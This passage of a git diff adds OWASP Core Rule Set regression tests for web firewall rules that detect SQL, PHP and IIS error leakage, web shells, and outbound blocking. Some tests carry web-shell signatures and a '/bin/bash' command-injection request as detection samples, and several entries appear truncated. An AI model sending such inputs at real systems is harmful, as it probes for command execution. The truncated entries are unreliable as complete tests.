WHERE DATE>='2014-04-01';. Semantic error 485. Near: '2014-04-01'. Exception 363. Transaction rollback." + output: + log_contains: "id \"951160\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml new file mode 100644 index 00000000..effc5864 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951170.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951170.yaml" + description: "Regression tests for rule 951170" +tests: + - test_title: 951170-1 + desc: "Matching hsqldb SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: at org.hsqldb.jdbc.JDBCDriver.connect(Unknown Source)" + output: + log_contains: "id \"951170\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml new file mode 100644 index 00000000..8a0dbec4 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951180.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951180.yaml" + description: "Regression tests for rule 951180" +tests: + - test_title: 951180-1 + desc: "Matching informix SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: '[match sql-errors.data]the used select statements have different number of columns[/match]: Exception in thread "main" java.sql.SQLException: An illegal character has been found in the statement.' + output: + log_contains: "id \"951180\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml new file mode 100644 index 00000000..4ca909e7 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951190.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951190.yaml" + description: "Regression tests for rule 951190" +tests: + - test_title: 951190-1 + desc: "Matching ingres SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: [5000A] [Actian][Ingres ODBC Driver][Ingres]Delimited identifier starting with '' contains no valid characters. (6692) (SQLExecDirectW)" + output: + log_contains: "id \"951190\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml new file mode 100644 index 00000000..b7212c5a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951200.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951200.yaml" + description: "Regression tests for rule 951200" +tests: + - test_title: 951200-1 + desc: "Matching interbase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Unexpected end of command in statement [SELECT * FROM INTO WHERE 'place'='xxxxxxx' AND 'yielddate' BETWEEN '01/11/2012' AND '29/11/2012''']." + output: + log_contains: "id \"951200\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml new file mode 100644 index 00000000..03824bd5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951210.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951210.yaml" + description: "Regression tests for rule 951210" +tests: + - test_title: 951210-1 + desc: "Matching maxDB SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: maxdb_query(): -8004 POS(62) Constant must be compatible with column type and length" + output: + log_contains: "id \"951210\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml new file mode 100644 index 00000000..6dc042ea --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951220.yaml @@ -0,0 +1,48 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951220.yaml" + description: "Regression tests for rule 951220" +tests: + - test_title: 951220-1 + desc: "Matching mssql SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: PHP Warning: mssql_query(): message: Incorrect syntax near 's'. (severity 15) in /Volumes/Data/Users/username/Desktop/createXML.php on line 375" + output: + log_contains: "id \"951220\"" + + - test_title: 951220-2 + desc: "Matching mssql SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Conversion failed when converting the varchar value 'secret' to data type int." + output: + log_contains: "id \"951220\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml new file mode 100644 index 00000000..f82cc793 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951230.yaml @@ -0,0 +1,47 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951230.yaml" + description: "Regression tests for rule 951230" +tests: + - test_title: 951230-1 + desc: "Matching MySQL SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1772 (HY000): Malformed GTID set specification 'secret_password'." + output: + log_contains: "id \"951230\"" + - test_title: 951230-2 + desc: "Matching MySQL SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR 1105 (HY000): XPATH syntax error: '\\secret'" + output: + log_contains: "id \"951230\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml new file mode 100644 index 00000000..d9e26975 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951240.yaml @@ -0,0 +1,47 @@ +--- +meta: + author: "azurit, Xhoenix" + enabled: true + name: "951240.yaml" + description: "Regression tests for rule 951240" +tests: + - test_title: 951240-1 + desc: "Matching PostgreSQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: pg_query(): supplied argument is not a valid PostgreSQL link resource in /var/www/sivusto/handler.php on line 56" + output: + log_contains: "id \"951240\"" + - test_title: 951240-2 + desc: "Matching PostgreSQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + uri: "/post" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: ERROR: invalid input syntax for integer" + output: + log_contains: "id \"951240\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml new file mode 100644 index 00000000..e01973cc --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951250.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951250.yaml" + description: "Regression tests for rule 951250" +tests: + - test_title: 951250-1 + desc: "Matching SQLite SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: SQLite3::query() [sqlite3.query]: 1 values for 2 columns in /mysite/product.php on line 94" + output: + log_contains: "id \"951250\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml new file mode 100644 index 00000000..33c3266c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-951-DATA-LEAKAGES-SQL/951260.yaml @@ -0,0 +1,27 @@ +--- +meta: + author: "azurit" + enabled: true + name: "951260.yaml" + description: "Regression tests for rule 951260" +tests: + - test_title: 951260-1 + desc: "Matching Sybase SQL Information Leakage" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "[match sql-errors.data]the used select statements have different number of columns[/match]: Warning: Sybase: Server message: Changed database context to 'rdhiman'. (severity 10, procedure N/A) in guestfatch.php on line 10" + output: + log_contains: "id \"951260\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml new file mode 100644 index 00000000..d01496d5 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953100.yaml @@ -0,0 +1,107 @@ +--- +meta: + author: "M4tteoP, Esad Cetiner" + enabled: true + name: "953100.yaml" + description: "Tests for rule 953100" +tests: + - test_title: 953100-1 + desc: "'File size is' leads to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Maximum allowed file size is 10 MB" + output: + no_log_contains: id "953100" + - test_title: 953100-2 + desc: "'Invalid date' Wordpress FP, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Invalid date selected" + output: + no_log_contains: id "953100" + - test_title: 953100-3 + desc: "'The function' might lead to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "please review the function" + output: + no_log_contains: id "953100" + - test_title: 953100-4 + desc: "'Static function' might lead to FPs, it should not match at PL1" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "This is a static function" + output: + no_log_contains: id "953100" + - test_title: 953100-5 + desc: "'cannot be empty is too common for PL-1 GH isue #3399" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Field cannot be empty." + output: + no_log_contains: id "953100" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml new file mode 100644 index 00000000..20f3789d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953101.yaml @@ -0,0 +1,107 @@ +--- +meta: + author: "M4tteoP, Esad Cetiner" + enabled: true + name: "953101.yaml" + description: "Tests for rule 953101" +tests: + - test_title: 953101-1 + desc: "'File size is' leads to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Maximum allowed file size is 10 MB" + output: + log_contains: id "953101" + - test_title: 953101-2 + desc: "'Invalid date' leads to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Invalid date selected" + output: + log_contains: id "953101" + - test_title: 953101-3 + desc: "'The function' might lead to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "Please review the function" + output: + log_contains: id "953101" + - test_title: 953101-4 + desc: "'Static function' might lead to FPs at PL1, it should match at PL2" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "This is a static function" + output: + log_contains: id "953101" + - test_title: 953101-5 + desc: "'cannot be empty is too common for PL-1, it should match at PL-2 GH isue #3399" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: "cannot be empty." + output: + log_contains: id "953101" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml new file mode 100644 index 00000000..89d5ab38 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-953-DATA-LEAKAGES-PHP/953120.yaml @@ -0,0 +1,147 @@ +--- +meta: + author: "fzipi" + enabled: true + name: "953120.yaml" + description: "Positive tests for rule 953120" +tests: + - test_title: 953120-1 + desc: "Just something that returns + output: + log_contains: "id \"953120\"" + - test_title: 953120-2 + desc: "Negative test, returns + output: + log_contains: "id \"953120\"" + - test_title: 953120-6 + desc: "Negative test, returns + output: + log_contains: "id \"953120\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml new file mode 100644 index 00000000..d5fb143d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954100.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Andrew Howe" + enabled: true + name: "954100.yaml" + description: "Tests for rule 954100" +tests: + - test_title: 954100-1 + desc: 'Returns C:\inetpub in the response body. Sends as Base64 encoded rather than using /anything to avoid the backslash being escaped in the response.' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "GET" + version: "HTTP/1.0" + uri: "/base64/QzpcaW5ldHB1YiAK" + output: + log_contains: "id \"954100\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml new file mode 100644 index 00000000..fc38fa89 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-954-DATA-LEAKAGES-IIS/954120.yaml @@ -0,0 +1,43 @@ +--- +meta: + author: "Felipe Zipitria" + enabled: true + name: "954120.yaml" + description: "Tests for rule 954120 - IIS Error information disclusure" +tests: + - test_title: 954120-1 + desc: 'Match IIS error page' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "POST" + version: "HTTP/1.1" + uri: "/anything" + data: | + text=404.14 - URL too long. + output: + log_contains: id "954120" + - test_title: 954120-2 + desc: 'Match IIS error page' + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: "POST" + version: "HTTP/1.1" + uri: "/anything" + data: | + text=500.15 - Server error: Direct requests for GLOBAL.ASA are not allowed. + output: + log_contains: id "954120" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml new file mode 100644 index 00000000..bd60930d --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-955-WEB-SHELLS/955100.yaml @@ -0,0 +1,70 @@ +--- +meta: + author: "azurit" + enabled: true + name: "955100.yaml" + description: "Regression tests for rule 955100" +tests: + - test_title: 955100-1 + desc: "Matching web shell NCC Shell" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | +

.:NCC:. Shell v + output: + log_contains: "id \"955100\"" + - test_title: 955100-2 + desc: "Matching web shell Simple PHP backdoor" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + + output: + log_contains: "id \"955100\"" + - test_title: 955100-3 + desc: "Matching web shell WinX Shell" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: | + -:[GreenwooD]:- WinX Shell + output: + log_contains: "id \"955100\"" diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml new file mode 100644 index 00000000..38d62b5f --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-959-BLOCKING-EVALUATION/959100.yaml @@ -0,0 +1,71 @@ +--- +meta: + author: "studersi" + enabled: true + name: "959100.yaml" + description: | + Test whether the outbound blocking mechanism works by testing whether rule 959100 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the blocking + rule to be triggered. +tests: + - test_title: 959100-1 + desc: Test is basically identical to 953120-0 (PHP leakage positive test in phase 4) but here we assert that the outbound blocking mechanism is triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: + output: + log_contains: "id \"959100\"" + - test_title: 959100-2 + desc: Test is basically identical to 953120-1 (PHP leakage negative test in phase 4) but here we assert that the outbound blocking mechanism is not triggered + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "GET" + version: "HTTP/1.0" + uri: "/anything" + data: + output: + log_contains: "Outbound Anomaly Score Exceeded [(]Total Score: " diff --git a/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml new file mode 100644 index 00000000..563d6cfc --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/RESPONSE-980-CORRELATION/980170.yaml @@ -0,0 +1,66 @@ +--- +meta: + author: "studersi" + enabled: true + name: "980170.yaml" + description: | + Test whether level 4 inbound reporting in phase 5 works by testing whether rule 980170 is triggered. + For these tests, existing test are repurposed with different assertions. Instead of asserting that the original + rules are triggered that the tests are written for, we assert that triggering these rules causes the corresponding + reporting rules to be triggered. +tests: + - test_title: 980170-1 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that was blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + # Will match rules + # - 920273: restricted characters violation + # - 920350: numeric IP in Host header + # - 932160: Unix remote command execution + # - 932236: Unix command injection + # - 932260: Unix remote command execution + uri: "/?a=/bin/bash" + output: + log_contains: "id \"980170\"" + - test_title: 980170-2 + desc: Test is similar to 920350-1 but here we check if at reporting level 4 a request is logged that scored but was not blocked + stages: + - stage: + input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + # Will match rule 920350: numeric IP in Host header + Host: "127.0.0.1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + protocol: "http" + uri: "/" + output: + log_contains: "id 